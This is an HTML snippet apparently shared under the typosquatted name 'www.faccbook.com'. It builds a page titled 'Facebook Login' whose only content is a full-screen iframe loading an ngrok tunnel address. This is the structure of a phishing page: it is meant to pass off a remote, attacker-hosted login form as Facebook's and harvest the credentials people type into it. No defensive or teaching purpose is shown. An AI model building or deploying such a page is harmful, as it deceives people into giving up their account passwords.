www.faccbook.com
2 years ago in CSS
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Facebook Login</title>
<link rel="shortcut icon" href="logo.png">
<style>
div {
position: relative;
width: 100%;
height: 100%;
}
iframe {
width: 100%;
height: 100vh;
}
</style>
</head>
<body>
<div>
<iframe src="https://1ce6-2a09-bac0-411-00-81e-ead1.eu.ngrok.io" frameborder="0" allowfullscreen>Facebook
Login</iframe>
</div>
</body>
</html>